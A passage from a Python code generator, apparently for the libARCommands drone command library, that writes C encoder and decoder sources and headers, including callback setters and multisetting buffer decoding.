cfile.write (' if ((retVal == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ') && (_'+arg.name+'->'+multiset_msg.name+'.isSet))\n')
cfile.write (' {\n')
cfile.write (' cmdSizeIndex = currIndexInBuffer;\n')
cfile.write (' cmdIndex = cmdSizeIndex + sizeof(uint16_t);\n')
cfile.write (' currFreeSizeInBuffer = buffLen - cmdIndex;\n')
cfile.write (' // Write the command\n')
cfile.write (' retVal = ' + ARFunctionName (LIB_MODULE, GEN_SUBMODULE, 'Generate' + ARCapitalize (get_ftr_old_name(multiset_msg.ftr)) + ARCapitalize (format_cmd_name(multiset_msg))) + ' (buffer + cmdIndex, currFreeSizeInBuffer, &cmdSize')
for multiset_msg_arg in multiset_msg.args:
cfile.write (', _' + arg.name+'->'+multiset_msg.name+'.'+multiset_msg_arg.name)
cfile.write (');\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') +')\n')
cfile.write (' {\n')
cfile.write (' // Write command size before the command\n')
cfile.write (' currIndexInBuffer = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU16ToBuffer') + ' (buffer, cmdSize, cmdSizeIndex, cmdSizeIndex + sizeof(uint16_t));\n')
cfile.write (' if (currIndexInBuffer == -1)\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
cfile.write (' // Update current Index\n')
cfile.write (' currIndexInBuffer += cmdSize;\n')
cfile.write (' // Update Multiset Size\n')
cfile.write (' multisetSize += sizeof(uint16_t) + cmdSize;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' // Write multiset size before all commands\n')
cfile.write (' multisetSizeIndex = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU16ToBuffer') + ' (buffer, multisetSize, multisetSizeIndex, multisetSizeIndex + sizeof(uint16_t));\n')
cfile.write (' if (multisetSizeIndex == -1)\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
cfile.write (' }\n')
cfile.write ('\n')
else:
cfile.write (' // Write arg _' + arg.name + '\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' currIndexInBuffer = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Add' + xmlToSize (ftr, cmd, arg) + 'ToBuffer') + ' (buffer, _' + arg.name + ', currIndexInBuffer, buffLen);\n')
cfile.write (' if (currIndexInBuffer == -1)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if no issue was found\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' *cmdLen = currIndexInBuffer;\n')
cfile.write (' } // No else --> Do not set cmdLen if an error occured\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n\n')
cfile.write ('\n')
cfile.write ('\n')
cfile.write ('// END GENERATED CODE\n')
cfile.close ()
#################################
# 7TH PART : #
#################################
# Generate public decoder H file#
#################################
hfile = open (paths.COMMANDSDEC_HFILE, 'w')
hfile.write (LICENCE_HEADER)
hfile.write ('/**\n')
hfile.write (' * @file ' + COMMANDSDEC_HFILE_NAME + '\n')
hfile.write (' * @brief libARCommands decoder header.\n')
hfile.write (' * This file contains all declarations needed to decode commands\n')
hfile.write (' * @note Autogenerated file\n')
hfile.write (' **/\n')
hfile.write ('#ifndef ' + COMMANDSDEC_DEFINE + '\n')
hfile.write ('#define ' + COMMANDSDEC_DEFINE + '\n')
hfile.write ('#include <' + COMMANDSTYPES_HFILE_NAME + '>\n')
hfile.write ('#include <inttypes.h>\n')
hfile.write ('\n')
hfile.write ('#ifdef __GNUC__\n')
hfile.write ('#define DEPRECATED __attribute__ ((deprecated))\n')
hfile.write ('#elif defined(_MSC_VER)\n')
hfile.write ('#define DEPRECATED __declspec(deprecated)\n' )
hfile.write ('#else\n')
hfile.write ('#define DEPRECATED\n')
hfile.write ('#endif\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Error codes for ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeBuffer') + ' function\n')
hfile.write (' */\n')
hfile.write ('typedef enum {\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ' = 0, ///< No error occured\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NO_CALLBACK') + ', ///< No error, but no callback was set (so the call had no effect)\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ', ///< The command buffer contained an unknown command\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ', ///< The command buffer did not contain enough data for the specified command\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ', ///< The string buffer was not big enough for the command description\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ', ///< Any other error\n')
hfile.write ('} ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ';\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief ARCOMMANDS_Decoder object holder\n')
hfile.write (' */\n')
hfile.write ('typedef struct ARCOMMANDS_Decoder_t ARCOMMANDS_Decoder_t;\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Creates a new ARCOMMANDS_Decoder_t\n')
hfile.write (' * @warning This function allocates memory.\n')
hfile.write (' * @note The memory must be freed by a call to ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DeleteDecoder') + '.\n')
hfile.write (' * @return A new ARCOMMANDS_Decoder_t instance. NULL in case of error.\n')
hfile.write (' */\n')
hfile.write ('ARCOMMANDS_Decoder_t* ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'NewDecoder') + ' (' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' *error);\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Deletes an ARCOMMANDS_Decoder_t\n')
hfile.write (' * @param decoder The Decoder to delete.\n')
hfile.write (' */\n')
hfile.write ('void ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DeleteDecoder') + ' (ARCOMMANDS_Decoder_t **decoder);\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Decode a comand\n')
hfile.write (' * On success, the callback set for the command will be called in the current thread.\n')
hfile.write (' * @param decoder the decoder instance\n')
hfile.write (' * @param buffer the command buffer to decode\n')
hfile.write (' * @param buffLen the length of the command buffer\n')
hfile.write (' * @return ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ' on success, any error code otherwise\n')
hfile.write (' */\n')
hfile.write (AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '\n')
hfile.write (ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeCommand') + ' (ARCOMMANDS_Decoder_t *decoder, const uint8_t *buffer, int32_t buffLen);\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Decode a comand buffer\n')
hfile.write (' * On success, the callback set for the command will be called in the current thread.\n')
hfile.write (' * @param buffer the command buffer to decode\n')
hfile.write (' * @param buffLen the length of the command buffer\n')
hfile.write (' * @return ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ' on success, any error code otherwise\n')
hfile.write (' */\n')
hfile.write (AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '\n')
hfile.write (ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeBuffer') + ' (const uint8_t *buffer, int32_t buffLen) DEPRECATED;\n')
hfile.write ('\n')
hfile.write ('\n/**\n')
hfile.write (' * @brief Describe a comand buffer\n')
hfile.write (' * @param buffer the command buffer to decode\n')
hfile.write (' * @param buffLen the length of the command buffer\n')
hfile.write (' * @param resString the string pointer in which the description will be stored\n')
hfile.write (' * @param stringLen the length of the string pointer\n')
hfile.write (' * @return ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ' on success, any error code otherwise\n')
hfile.write (' */\n')
hfile.write (AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '\n')
hfile.write (ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DescribeBuffer') + ' (uint8_t *buffer, int32_t buffLen, char *resString, int32_t stringLen);\n')
hfile.write ('\n')
for ftr in allFeatures:
hfile.write ('// Feature ' + get_ftr_old_name(ftr) + '\n\n')
for cmd in ftr.cmds + ftr.evts:
for multiset_arg in [arg for arg in cmd.args if isinstance(arg.argType, ArMultiSetting)]:
hfile.write ('/**\n')
hfile.write (' * @brief Decode a '+ARTypeName (LIB_MODULE, get_ftr_old_name(ftr), multiset_arg.argType.name)+'\n')
hfile.write (' * On success, the callback set for each commands of the multisetting will be called in the current thread.\n')
hfile.write (' * @param decoder the decoder instance\n')
hfile.write (' * @param multisetting the multisetting to decode\n')
hfile.write (' * @return ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ' on success, any error code otherwise\n')
hfile.write (' */\n')
hfile.write (AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '\n')
hfile.write (ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Decode'+ARCapitalize(ftr.name)+ARCapitalize(cmd.name)) + ' (ARCOMMANDS_Decoder_t *decoder, '+xmlToC(LIB_MODULE, ftr, cmd, multiset_arg, True)+' multisetting);\n')
hfile.write ('\n')
brefCmdName = cmd.name if cmd.cls is None else cmd.cls.name + '.' + cmd.name
hfile.write ('\n/**\n')
hfile.write (' * @brief callback type for the command ' + get_ftr_old_name(ftr) + '.' + brefCmdName + '\n')
hfile.write (' */\n')
hfile.write ('typedef void (*' + ARTypeName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ') (')
first = True
for arg in cmd.args:
if first:
first = False
else:
hfile.write (', ')
hfile.write (xmlToCcharAreConst (LIB_MODULE, ftr, cmd, arg, True) + ' ' + arg.name)
if not first:
hfile.write (', ')
hfile.write ('void *custom);\n')
hfile.write ('/**\n')
hfile.write (' * @brief Set Decoder callback setter for the command ' + get_ftr_old_name(ftr) + '.' + brefCmdName + '\n')
hfile.write (' * @param decoder the decoder instance\n')
hfile.write (' * @param callback new callback for the command ' + get_ftr_old_name(ftr) + '.' + brefCmdName + '\n')
hfile.write (' * @param custom pointer that will be passed to all calls to the callback\n')
hfile.write (' */\n')
hfile.write ('void ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Cb') + ' (ARCOMMANDS_Decoder_t *decoder, ' + ARTypeName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' callback, void *custom);\n')
hfile.write ('/**\n')
hfile.write (' * @brief callback setter for the command ' + get_ftr_old_name(ftr) + '.' + brefCmdName + '\n')
hfile.write (' * @param callback new callback for the command ' + get_ftr_old_name(ftr) + '.' + brefCmdName + '\n')
hfile.write (' * @param custom pointer that will be passed to all calls to the callback\n')
hfile.write (' */\n')
hfile.write ('void ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' (' + ARTypeName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' callback, void *custom) DEPRECATED;\n')
hfile.write ('\n')
hfile.write ('#endif /* ' + COMMANDSDEC_DEFINE + ' */\n')
hfile.close ()
#################################
# 8TH PART : #
#################################
# Generate decoder C part #
#################################
cfile = open (paths.COMMANDSDEC_CFILE, 'w')
cfile.write (LICENCE_HEADER)
cfile.write ('/********************************************\n')
cfile.write (' * AUTOGENERATED FILE *\n')
cfile.write (' * DO NOT MODIFY IT *\n')
cfile.write (' * *\n')
cfile.write (' * To add new commands : *\n')
cfile.write (' * - Modify ../Xml/commands.xml file *\n')
cfile.write (' * - Re-run generateCommandsList.py script *\n')
cfile.write (' * *\n')
cfile.write (' ********************************************/\n')
cfile.write ('#include <config.h>\n')
cfile.write ('#include <stdio.h>\n')
cfile.write ('#include "' + COMMANDSRW_HFILE_NAME + '"\n')
cfile.write ('#include <' + COMMANDSTYPES_HFILE_NAME + '>\n')
cfile.write ('#include <' + COMMANDSDEC_HFILE_NAME + '>\n')
cfile.write ('#include <' + COMMANDSID_HFILE_NAME + '>\n')
cfile.write ('#include <libARSAL/ARSAL_Mutex.h>\n')
cfile.write ('\n')
cfile.write ('// ARCOMMANDS_Decoder_t structure definition\n')
cfile.write ('struct ARCOMMANDS_Decoder_t\n')
cfile.write ('{\n')
cfile.write (' ARSAL_Mutex_t mutex;\n\n')
for ftr in allFeatures:
cfile.write (' // Feature ' + get_ftr_old_name(ftr) + '\n')
for cmd in ftr.cmds + ftr.evts:
cfile.write(' ' + ARTypeName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' ' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(format_cmd_name(cmd)) + 'Callback;\n')
cfile.write(' void *' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(format_cmd_name(cmd)) + 'Custom;\n');
cfile.write ('\n')
cfile.write ('};\n')
cfile.write ('\n')
cfile.write ('\n')
cfile.write ('// Constructor\n')
cfile.write ('ARCOMMANDS_Decoder_t* ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'NewDecoder') + ' (' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' *error)\n')
cfile.write ('{\n')
cfile.write (' ARCOMMANDS_Decoder_t *decoder = NULL;\n')
cfile.write (' int err = 0;\n')
cfile.write ('\n')
cfile.write (' decoder = calloc(1, sizeof(*decoder));\n')
cfile.write (' if (decoder == NULL)\n')
cfile.write (' goto end;\n')
cfile.write ('\n')
cfile.write (' err = ARSAL_Mutex_Init (&decoder->mutex);\n')
cfile.write (' if (err != 0) {\n')
cfile.write (' free(decoder);\n')
cfile.write (' decoder = NULL;\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write ('end:\n')
cfile.write (' if (error)\n')
cfile.write (' *error = decoder ? ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ' : ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n')
cfile.write ('\n');
cfile.write (' return decoder;\n')
cfile.write ('}\n\n')
cfile.write ('// Destructor\n')
cfile.write ('void ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DeleteDecoder') + ' (ARCOMMANDS_Decoder_t **decoder)\n')
cfile.write ('{\n')
cfile.write (' if (decoder && (*decoder)) {\n');
cfile.write (' ARSAL_Mutex_Destroy(&(*decoder)->mutex);\n')
cfile.write (' free(*decoder);\n');
cfile.write (' *decoder = NULL;\n');
cfile.write (' }\n');
cfile.write ('}\n\n')
cfile.write ('// CALLBACK VARIABLES + SETTERS\n')
cfile.write ('\n')
cfile.write ('static ARSAL_Mutex_t ' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'mutex') + ';\n')
cfile.write ('static int ' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'isInit') + ' = 0;\n')
cfile.write ('static int ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Init') + ' (void)\n')
cfile.write ('{\n')
cfile.write (' if ((' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'isInit') + ' == 0) &&\n')
cfile.write (' (ARSAL_Mutex_Init (&' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'mutex') + ') == 0))\n')
cfile.write (' {\n')
cfile.write (' ' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'isInit') + ' = 1;\n')
cfile.write (' } // No else --> Do nothing if already initialized\n')
cfile.write (' return ' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'isInit') + ';\n')
cfile.write ('}\n')
cfile.write ('\n')
for ftr in allFeatures:
cfile.write ('// Feature ' + get_ftr_old_name(ftr) + '\n\n')
for cmd in ftr.cmds + ftr.evts:
for multiset_arg in [arg for arg in cmd.args if isinstance(arg.argType, ArMultiSetting)]:
cfile.write (AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '\n')
cfile.write (ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Decode'+ARCapitalize(ftr.name)+ARCapitalize(cmd.name)) + ' (ARCOMMANDS_Decoder_t *decoder, '+xmlToC(LIB_MODULE, ftr, cmd, multiset_arg, True)+' multisetting)\n')
cfile.write ('{\n')
cfile.write (' ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ';\n')
cfile.write (' if ((NULL == decoder) ||\n')
cfile.write (' (NULL == multisetting))\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n')
cfile.write (' } // No else --> Arg check\n')
cfile.write (' \n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
for multiset_msg in multiset_arg.argType.msgs:
if multiset_msg.cls:
DECODER_CBNAME = ARCapitalize (get_ftr_old_name(multiset_msg.ftr)) + ARCapitalize (multiset_msg.cls.name) + ARCapitalize (multiset_msg.name) + 'Callback'
DECODER_CBCUSTOMNAME = ARCapitalize (get_ftr_old_name(multiset_msg.ftr)) + ARCapitalize (multiset_msg.cls.name) + ARCapitalize (multiset_msg.name) + 'Custom'
else:
DECODER_CBNAME = ARCapitalize (get_ftr_old_name(multiset_msg.ftr)) + ARCapitalize (multiset_msg.name) + 'Callback'
DECODER_CBCUSTOMNAME = ARCapitalize (get_ftr_old_name(multiset_msg.ftr)) + ARCapitalize (multiset_msg.name) + 'Custom'
cfile.write (' if ((multisetting->'+multiset_msg.name+'.isSet) && (decoder->' + DECODER_CBNAME + ')) {\n')
cfile.write (' decoder->' + DECODER_CBNAME + ' (')
first = True
for arg in multiset_msg.args:
if first:
first = False
else:
cfile.write (', ')
cfile.write ('multisetting->'+multiset_msg.name+'.' + arg.name)
if not first:
cfile.write (', ')
cfile.write ('decoder->' + DECODER_CBCUSTOMNAME + ');\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('void ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Cb') + ' (ARCOMMANDS_Decoder_t *decoder, ' + ARTypeName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' callback, void *custom)\n')
cfile.write ('{\n')
cfile.write (' if (!decoder)\n')
cfile.write (' return;\n')
cfile.write ('\n')
cfile.write (' ARSAL_Mutex_Lock (&decoder->mutex);\n')
cfile.write (' decoder->' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback = callback;\n')
cfile.write (' decoder->' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Custom = custom;\n')
cfile.write (' ARSAL_Mutex_Unlock (&decoder->mutex);\n')
cfile.write ('}\n\n')
cfile.write ('static ' + ARTypeName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' ' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Cb') + ' = NULL;\n')
cfile.write ('static void *' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Custom') + ' = NULL;\n')
cfile.write ('void ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' (' + ARTypeName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' callback, void *custom)\n')
cfile.write ('{\n')
cfile.write (' if (' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Init') + ' () == 1)\n')
cfile.write (' {\n')
cfile.write (' ARSAL_Mutex_Lock (&' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'mutex') + ');\n')
cfile.write (' ' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Cb') + ' = callback;\n')
cfile.write (' ' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Custom') + ' = custom;\n')
cfile.write (' ARSAL_Mutex_Unlock (&' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'mutex') + ');\n')
cfile.write (' } // No else --> do nothing if library can not be initialized\n')
cfile.write ('}\n')
cfile.write ('\n')
for ftr in allFeatures:
for cmd in [cmdx for cmdx in ftr.cmds + ftr.evts if cmdx.args]:
cfile.write ('static ' +AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) +' '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'DecodeArgs') + ' (const uint8_t *buffer, int32_t buffLen, int32_t *offset')
for arg in cmd.args:
cfile.write (', '+ xmlToCcharAreConst (LIB_MODULE, ftr, cmd, arg) +' *_' + arg.name)
cfile.write (');\n')
cfile.write ('static ' +AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) +' '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'DescribeArgs') + ' (uint8_t *buffer, int32_t buffLen, int32_t *offset, char *resString, int32_t strLen, int32_t *strOffset);\n')
cfile.write ('\n')
for ftr in allFeatures:
for cmd in [cmdx for cmdx in ftr.cmds + ftr.evts if cmdx.args]:
cfile.write ('static ' +AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) +' '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'DecodeArgs') + ' (const uint8_t *buffer, int32_t buffLen, int32_t *offset')
for arg in cmd.args:
cfile.write (', '+ xmlToCcharAreConst (LIB_MODULE, ftr, cmd, arg) +' *_' + arg.name)
cfile.write (')\n')
cfile.write ('{\n')
cfile.write (' ' +AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) +' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ';\n')
cfile.write (' int32_t error = 0;\n')
hasMutiSet = bool([arg for arg in cmd.args if isinstance(arg.argType, ArMultiSetting)])
if hasMutiSet:
cfile.write (' eARCOMMANDS_ID_FEATURE commandFeature = -1;\n')
cfile.write (' int commandClass = -1;\n')
cfile.write (' int commandId = -1;\n')
cfile.write (' uint16_t multisetSize = 0;\n')
cfile.write (' int32_t multisetEnd = 0;\n')
cfile.write (' uint16_t cmdSize = 0;\n')
cfile.write ('\n')
cfile.write (' if ((NULL == buffer)')
for arg in cmd.args:
cfile.write (' ||\n (NULL == _' + arg.name+')')
cfile.write (')\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n')
cfile.write (' } // No else --> Arg check\n')
cfile.write ('\n')
for arg in cmd.args:
if isinstance(arg.argType, ArMultiSetting):
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' memset(_' + arg.name+', 0, sizeof(*_' + arg.name+'));\n')
cfile.write (' multisetSize = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' multisetEnd = *offset + multisetSize;\n')
cfile.write (' cmdSize = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' while ((retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ') &&\n')
cfile.write (' (*offset < multisetEnd))\n')
cfile.write (' {\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandFeature = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandClass = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandId = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' switch (commandFeature)\n')
cfile.write (' {\n')
#regroup multisetting msgs by feature and by class
